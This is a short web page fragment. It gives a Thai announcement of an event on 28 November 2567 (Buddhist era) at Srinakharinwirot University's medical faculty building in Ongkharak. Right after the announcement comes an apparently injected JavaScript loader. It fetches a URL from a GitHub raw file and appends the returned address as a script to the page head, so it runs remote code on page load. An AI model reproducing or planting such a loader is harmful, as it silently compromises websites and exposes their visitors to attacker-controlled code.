ในวันพฤหัสบดีที่ 28 พฤศจิกายน 2567 เวลา 08.00 น. เป็นต้นไป ณ ห้องConvention room ชั้น 3 อาคารเรียนและปฏิบัติการคณะแพทยศาสตร์ มหาวิทยาลัยศรีนครินทรวิโรฒ องครักษ์
;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});